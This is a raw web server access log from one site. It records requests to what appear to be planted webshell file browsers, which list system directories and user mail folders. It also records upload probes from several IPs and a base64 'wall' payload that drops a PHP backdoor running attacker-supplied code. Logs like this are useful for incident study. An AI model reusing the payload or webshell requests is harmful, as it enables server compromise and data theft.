216.73.216.189 - - [01/Dec/2025:21:07:42 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fpam_console_apply&path=%2F%2Fsbin HTTP/1.1" 200 618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:07:42 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail%2Fnew HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:18 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.trash HTTP/1.1" 200 872 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fmail%2Ftmp HTTP/1.1" 200 689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /d4fae/?path=%2Fhome%2F..%2Fetc HTTP/1.1" 200 3676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /d4fae/?path=%2Fhome%2F..%2Froot HTTP/1.1" 200 1168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /d4fae/?path=%2Fhome%2F..%2Fbin HTTP/1.1" 200 16045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2F.gemrc&path=%2Fhome%2Fi442524 HTTP/1.1" 200 712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.spamassassinenable&path=%2Fhome%2Fi442524 HTTP/1.1" 200 625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.razor%2Fserver.c301.cloudmark.com.conf&path=%2Fhome%2Fi442524%2F.razor HTTP/1.1" 200 948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:44 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot.index&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Flscache HTTP/1.1" 200 682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:06:59 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Faccess-logs HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:07:42 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fmail%2Fnew HTTP/1.1" 200 3317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:21:10:13 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2740.67 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:21:10:13 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2740.67 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:21:06:59 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.myimunify_id&path=%2Fhome%2Fi442524 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:08:55 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2F.contactemail&path=%2Fhome%2Fi442524 HTTP/1.1" 200 644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
45.227.253.15 - - [01/Dec/2025:21:09:19 +0000] "GET /index.php/jk HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/82.0.1055.1 Safari/535.24"
192.121.16.196 - - [01/Dec/2025:21:09:58 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2740.67 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:21:10:03 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2740.67 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:21:11:36 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot.list.index&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:21:18:56 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2946.50 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:21:18:58 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2946.50 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:21:18:58 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2946.50 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:21:18:58 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail%2F.marketing%40galavista_com HTTP/1.1" 200 1430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:59 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.softaculous HTTP/1.1" 200 1005 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:58 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail%2F.segura_claudia%40galavista_com HTTP/1.1" 200 1530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:59 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.caldav HTTP/1.1" 200 1803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:00 +0000] "GET /29b99/?path=%2F%2Fhome1 HTTP/1.1" 200 661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:59 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Ftmp%2F.crontab.lock&path=%2F%2Ftmp HTTP/1.1" 200 614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:00 +0000] "GET /dfb27f996d.php?path=%2F%2Fbin HTTP/1.1" 200 14870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:01 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fcracklib-packer&path=%2F%2Fsbin HTTP/1.1" 200 617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:00 +0000] "GET /dfb27f996d.php?path=%2F%2Fvar HTTP/1.1" 200 1145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:01 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fmail%2F.spam HTTP/1.1" 200 1044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:02 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2F.cphorde HTTP/1.1" 200 946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:01 +0000] "GET /dfb27f996d.php?path=%2F%2Fdev HTTP/1.1" 200 853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:02 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2F.cphorde HTTP/1.1" 200 946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:02 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail%2F.spam HTTP/1.1" 200 1044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:03 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.trash HTTP/1.1" 200 1485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:02 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.sitepad%2F. HTTP/1.1" 200 1493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:03 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.spamassassin HTTP/1.1" 200 1501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:03 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fetc HTTP/1.1" 200 1805 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:04 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2F.koality HTTP/1.1" 200 683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:03 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2F.koality HTTP/1.1" 200 683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:04 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fdnssec-keygen&path=%2F%2Fsbin HTTP/1.1" 200 615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:21:10:27 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2740.67 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:21:11:36 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fdnssec-checkds&path=%2F%2Fsbin HTTP/1.1" 200 1048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:21:18:32 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2946.50 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:21:18:58 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.koality HTTP/1.1" 200 1412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:59 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fmail%2F.marketing%40galavista_com HTTP/1.1" 200 1400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:59 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fmail%2F.segura_claudia%40galavista_com HTTP/1.1" 200 1530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:00 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww%2F. HTTP/1.1" 200 1922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:00 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Flogs HTTP/1.1" 200 1712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:01 +0000] "GET /29b99/?path=%2F%2Fusr HTTP/1.1" 200 1012 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:01 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.subaccounts HTTP/1.1" 200 1499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:02 +0000] "GET /29b99/?path=%2F%2Fhome6 HTTP/1.1" 200 661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:58 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fmkhomedir_helper&path=%2F%2Fsbin HTTP/1.1" 200 617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:02 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fldconfig&path=%2F%2Fsbin HTTP/1.1" 200 611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:04 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fmail%2F.gerencia%40galavista_com HTTP/1.1" 200 1433 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:19:03 +0000] "GET /d4fae/?path=%2Fhome%2F. HTTP/1.1" 200 1420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
43.152.72.244 - - [01/Dec/2025:21:09:28 +0000] "GET /7709b/?filesrc=/home/i442524/public_html/7709b/error_log&path=/home/i442524/public_html/7709b HTTP/1.1" 200 33719 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [01/Dec/2025:21:10:03 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2740.67 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:21:11:36 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot.list.index&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:11:36 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fsaslauthd&path=%2F%2Fsbin HTTP/1.1" 200 610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:11:36 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fdnssec-settime&path=%2F%2Fsbin HTTP/1.1" 200 614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:11:36 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fdnssec-keyfromlabel&path=%2F%2Fsbin HTTP/1.1" 200 618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:11:37 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fwww HTTP/1.1" 200 1290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:11:37 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fcracklib-format&path=%2F%2Fsbin HTTP/1.1" 200 772 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:11:36 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2F.razor HTTP/1.1" 200 1052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:21:18:56 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2946.50 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:21:18:57 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2946.50 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:21:18:57 +0000] "GET /dfb27f996d.php?path=%2F%2Fproc HTTP/1.1" 200 2542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:57 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Ftmp%2FphpyU4bQq&path=%2F%2Ftmp HTTP/1.1" 200 609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:18:57 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail%2F.Junk HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:29 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.softaculous.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 1208 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:30 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2FRCMTEMPthumbf891ecd4ebb6d1cb9a0e67c3e35b2c03.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:30 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.caldav.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:31 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fsegura.claudia%40galavista.com_default_webmail_app.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:22:32 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.gemrc.gemrc.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
